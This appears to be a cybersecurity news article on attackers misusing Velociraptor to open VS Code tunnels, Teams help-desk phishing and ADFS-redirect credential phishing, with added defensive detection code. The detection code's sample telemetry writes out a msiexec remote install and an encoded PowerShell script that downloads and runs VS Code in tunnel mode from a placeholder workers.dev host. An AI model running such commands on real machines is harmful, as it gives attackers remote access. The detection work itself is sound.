
Cybersecurity researchers have drawn attention to a cyberattack in which unknown threat actors deployed Velociraptor, an open source endpoint monitoring and digital forensics tool, demonstrating the ongoing abuse of legitimate software for malicious purposes.
“In this incident, the threat actor used the tool to download and run Visual Studio Code, which could create a tunnel to an attacker-controlled command-and-control (C2) server,” the Sophos Counter Threat Unit Research team said in a report published this week.
Threat actors are known to employ living-off-the-land (LOTL) techniques and to use legitimate remote monitoring and management (RMM) tools in attacks, but the use of Velociraptor signals a tactical evolution.

Further analysis of the incident showed that the attacker used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain. That domain also acted as a staging ground for other tools, such as the Cloudflare Tunnel tool and the remote administration utility known as Radmin.
The MSI file is designed to install Velociraptor and establish contact with another Cloudflare Workers domain. The attacker then used that access to download Visual Studio Code from the same staging server using encoded PowerShell commands, and ran the source code editor with its tunnel option enabled, allowing both remote access and remote code execution.
The threat actors were also observed reusing the msiexec utility to download additional payloads from a workers[.]dev domain.
“Organizations need to monitor and investigate the misuse of Velociraptor and treat this tradecraft observation as a precursor to ransomware,” Sophos said. “Ransomware threats can be mitigated by implementing endpoint detection and response systems, monitoring for unexpected tools and suspicious behavior, and following best practices for protecting systems and maintaining backups.”
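The chain described above (msiexec pulling an installer from a workers.dev host, the Velociraptor agent spawning encoded PowerShell, and VS Code started in tunnel mode) is what a detection would key on. The following is an added example, not code from Sophos or the Velociraptor project: a small triage routine run over process-creation events. The event field names (image, parent_image, command_line), the hostnames and the sample events, including the Base64-encoded script, are constructed for illustration.

```python
"""Triage process-creation events for the Velociraptor -> VS Code tunnel chain.

Added example, not Sophos or Velociraptor code. Event fields (image,
parent_image, command_line) are an assumption modelled on Sysmon/EDR
process telemetry; the sample events below are constructed.
"""
import base64
import re

# Cloudflare Workers hosts were the staging server in the reported intrusion.
WORKERS_DEV = re.compile(r"https?://[\w.-]+\.workers\.dev\b", re.I)
ANY_URL = re.compile(r"https?://\S+", re.I)
# -e / -ec / -enc / -EncodedCommand followed by the Base64 payload.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# "code tunnel ..." or "...\code.exe tunnel ..." (VS Code Remote Tunnel mode).
VSCODE_TUNNEL = re.compile(r"\bcode(?:\.exe)?\s+tunnel\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand (UTF-16LE Base64), or None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_process_events(events):
    """Return (rule_name, event_id) pairs for every rule an event trips."""
    findings = []
    for ev in events:
        name = ev["image"].lower().rsplit("\\", 1)[-1]
        parent = ev.get("parent_image", "").lower().rsplit("\\", 1)[-1]
        cmd = ev["command_line"]

        # Rule 1: msiexec installing straight from a URL (LOTL download + install).
        if name == "msiexec.exe" and ANY_URL.search(cmd):
            findings.append(("msiexec_remote_install", ev["id"]))

        # Rule 2: the DFIR agent itself spawning a shell, which a benign
        # deployment does not normally do.
        if parent == "velociraptor.exe" and name in SHELLS:
            findings.append(("velociraptor_spawns_shell", ev["id"]))

        # Rule 3: encoded PowerShell; inspect the decoded script, not the Base64.
        decoded = decode_encoded_command(cmd) if name in {"powershell.exe", "pwsh.exe"} else None
        if decoded:
            findings.append(("encoded_powershell", ev["id"]))
        effective = decoded or cmd

        # Rule 4: any reference to a workers.dev staging host, raw or decoded.
        if WORKERS_DEV.search(effective):
            findings.append(("workers_dev_staging", ev["id"]))

        # Rule 5: VS Code launched in tunnel mode, raw or decoded.
        if VSCODE_TUNNEL.search(effective):
            findings.append(("vscode_tunnel", ev["id"]))
    return findings


# Constructed sample telemetry mirroring the reported chain (hostnames are placeholders).
INNER_SCRIPT = (
    "Invoke-WebRequest -Uri https://stage.example.workers.dev/code.zip -OutFile C:\\ProgramData\\code.zip; "
    "Expand-Archive C:\\ProgramData\\code.zip C:\\ProgramData\\code; "
    "& C:\\ProgramData\\code\\code.exe tunnel --accept-server-license-terms --name agent"
)
ENCODED_SCRIPT = base64.b64encode(INNER_SCRIPT.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "msiexec.exe /q /i https://stage.example.workers.dev/agent.msi"},
    {"id": 2, "image": r"C:\Program Files\Velociraptor\velociraptor.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "velociraptor.exe --config client.config.yaml client"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Velociraptor\velociraptor.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED_SCRIPT},
    {"id": 4, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Users\u\notes.txt"},
]

if __name__ == "__main__":
    for rule, event_id in triage_process_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Rule 3 decodes the -EncodedCommand argument as UTF-16LE, which is the encoding PowerShell expects, and the later rules match on the decoded text; that is what surfaces the `code.exe tunnel` invocation and the staging host, both of which the raw command line hides. Velociraptor spawning a shell is legitimate during an authorized collection, so rule 2 should be correlated with your own deployment inventory before it is treated as an alert.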

The disclosure comes as cybersecurity companies Hunters and Permiso detailed a malicious campaign that leverages Microsoft Teams for initial access, reflecting a growing pattern of threat actors weaponizing the platform's trusted and deeply embedded role in enterprise communications to deploy malware.
These attacks begin with direct messages or calls to targets from newly created or compromised tenants, with the attackers impersonating IT help desk staff or other trusted contacts, persuading the victim to install remote access software such as AnyDesk, DWAgent, or Quick Assist, and then seizing control of the machine to deliver malware.
Similar techniques, including the use of remote access tools, have been linked to ransomware groups such as Black Basta since mid-2024, but these new campaigns forgo the preliminary email-bombing step and ultimately use the remote access to deliver a PowerShell payload with capabilities broadly related to credential theft, persistence, and remote code execution.
“The lures used to initiate engagement are usually tailored to appear routine and inconspicuous, framed as IT assistance related to Teams performance, system maintenance, or general technical support,” says Permiso researcher Isuf Deliu. “These scenarios are designed to blend in with the context of everyday corporate communications, making them less likely to raise suspicion.”
It is worth noting that similar tactics have been used over the past year to propagate malware families such as DarkGate and Matanbuchus.
The attack also displays a Windows credential prompt that tricks the victim into entering their password under the guise of a benign system configuration request; the password is then saved to a text file on the system.
“Microsoft Teams phishing is no longer a fringe technique. It's an active and evolving threat that bypasses traditional email defenses and exploits trust in collaboration tools,” say security researchers Alon Klayman and Tomer Kachlon.
“By monitoring audit logs such as ChatCreated and MessageSent, enriching signals with contextual data, and training users to recognize IT/help desk spoofing, SOC teams can close this emerging gap before it is exploited.”
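As an added example of the audit-log monitoring the researchers recommend (this is not Permiso's or Hunters' code), the routine below triages Teams ChatCreated and MessageSent records for chats that involve an unvetted external tenant and carry a help-desk lure, the pattern described for the campaign above. The record layout is an assumption modelled on Microsoft 365 unified audit log Teams entries (Workload, Operation, UserId, ChatName, ParticipantInfo), the tenant IDs and addresses are placeholders, and the records are constructed.

```python
"""Flag Teams chats opened from outside the tenant by senders posing as IT support.

Added example, not Permiso or Hunters code. Record fields are an assumption
modelled on Microsoft 365 unified audit log Teams entries; tenant IDs,
addresses and the records themselves are constructed placeholders.
"""
import json
import re

OUR_TENANT_ID = "11111111-1111-1111-1111-111111111111"        # assumption: the defended tenant
VETTED_TENANT_IDS = {"22222222-2222-2222-2222-222222222222"}  # assumption: approved partner tenants
LURE_WORDS = re.compile(r"help\s*desk|service\s*desk|it\s*support|tech(?:nical)?\s*support", re.I)

# Constructed newline-delimited JSON shaped like unified audit log Teams records.
SAMPLE_AUDIT_NDJSON = "\n".join(json.dumps(r) for r in [
    {"Id": "r1", "Workload": "MicrosoftTeams", "Operation": "ChatCreated",
     "UserId": "helpdesk@contoso-itsupport.onmicrosoft.com",
     "ChatName": "IT Help Desk - Ticket 4821",
     "ParticipantInfo": {"HasForeignTenantUsers": True,
                         "ParticipatingTenantIds": [OUR_TENANT_ID, "33333333-3333-3333-3333-333333333333"]}},
    {"Id": "r2", "Workload": "MicrosoftTeams", "Operation": "MessageSent",
     "UserId": "alice@example.com", "ChatName": "IT Help Desk - Ticket 4821",
     "ParticipantInfo": {"HasForeignTenantUsers": True,
                         "ParticipatingTenantIds": [OUR_TENANT_ID, "33333333-3333-3333-3333-333333333333"]}},
    {"Id": "r3", "Workload": "MicrosoftTeams", "Operation": "MessageSent",
     "UserId": "bob@partner.example", "ChatName": "Q3 roadmap sync",
     "ParticipantInfo": {"HasForeignTenantUsers": True,
                         "ParticipatingTenantIds": [OUR_TENANT_ID, "22222222-2222-2222-2222-222222222222"]}},
    {"Id": "r4", "Workload": "Exchange", "Operation": "MailItemsAccessed", "UserId": "alice@example.com"},
])


def parse_audit_ndjson(text):
    """Parse one JSON record per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def triage_teams_records(records):
    """Map record Id -> list of reasons for records worth an analyst's time."""
    findings = {}
    for rec in records:
        if rec.get("Workload") != "MicrosoftTeams" or rec.get("Operation") not in {"ChatCreated", "MessageSent"}:
            continue
        info = rec.get("ParticipantInfo") or {}
        external = set(info.get("ParticipatingTenantIds", [])) - {OUR_TENANT_ID}
        reasons = []
        # Signal 1: a cross-tenant chat with a tenant nobody has vetted.
        if info.get("HasForeignTenantUsers") and external - VETTED_TENANT_IDS:
            reasons.append("unvetted_external_tenant")
        # Signal 2 (heuristic): throwaway tenants rarely bother with a custom domain.
        sender_domain = rec.get("UserId", "").rsplit("@", 1)[-1].lower()
        if sender_domain.endswith(".onmicrosoft.com"):
            reasons.append("default_onmicrosoft_sender")
        # Signal 3: the chat is dressed up as IT / help desk support.
        if LURE_WORDS.search(rec.get("ChatName") or ""):
            reasons.append("helpdesk_lure_in_chat_name")
        # Only escalate external chats that also carry a lure signal, so that
        # ordinary partner conversations do not flood the queue.
        if "unvetted_external_tenant" in reasons and len(reasons) > 1:
            findings[rec["Id"]] = reasons
    return findings


if __name__ == "__main__":
    for rec_id, reasons in triage_teams_records(parse_audit_ndjson(SAMPLE_AUDIT_NDJSON)).items():
        print(rec_id, ", ".join(reasons))
```

The gating at the end is the design choice: an external tenant on its own is normal in a federated environment, so the routine only escalates when the external contact also looks like a help desk or comes from a default onmicrosoft.com address. Tenant IDs and chat names are the contextual data the researchers mention; in production they would come from the audit log export rather than the constructed sample above.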

The findings also follow the discovery of a new phishing campaign that combines legitimate office[.]com links with Active Directory Federation Services (ADFS) to redirect users to a Microsoft 365 phishing page that harvests login credentials.
The attack chain, in a nutshell, starts when the victim clicks on a fraudulent sponsored link on a search engine results page, which triggers a redirect chain that ultimately leads to a fake login page mimicking Microsoft's.
“It turns out that the attacker has set up a custom Microsoft tenant with Active Directory Federation Services (ADFS) configured,” says Luke Jennings of Push Security. “This means Microsoft will perform a redirect to a custom malicious domain.”
“This is not a vulnerability, but the ability for an attacker to add their own Microsoft ADFS server to host phishing pages and use Microsoft's redirect is a concerning development that makes already-difficult URL-based detection even harder.”